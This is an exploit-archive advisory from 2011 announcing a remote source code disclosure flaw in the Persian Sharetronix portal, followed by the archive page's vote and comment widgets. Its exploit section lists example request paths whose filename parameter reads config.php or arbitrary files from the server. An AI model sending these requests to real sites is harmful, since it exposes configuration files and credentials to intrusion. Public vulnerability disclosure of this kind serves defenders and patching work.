Persian Sharetronix Portal Source Code Disclosure

2011.08.06

Credit: kurdish hackers team

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

===========================================================
Persian Sharetronix portal Remote Source Code Disclosure Vulnerability
-----------------------------------------------------------
foun by :kurdish hackers team
group : kurd-team
contact : pshela@yahoo.com
site : kurdteam.org
-----------------------------------------------------------
------------------------script-----------------------------
-----------------------------------------------------------
script name: Persian Sharetronix
download: http://donbaler.com/i/upload/2/1311602963.zip
-----------------------------------------------------------
Exploit:
--------
Exmple:
-------
ww.site //i/upload/Privacy.txt?filename=/police/config.php
www.site /themes/twitterish/theme.php?filename=[remote]
/themes/default/theme.php?filename=[remote]
/i/attachments/1/1283027343439172.php?filename=[remote]
-----------------------------------------------------------
Zryan_kurd , AhMaD-HaWLeRY
-----------------------------------------------------------

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Persian Sharetronix Portal Source Code Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.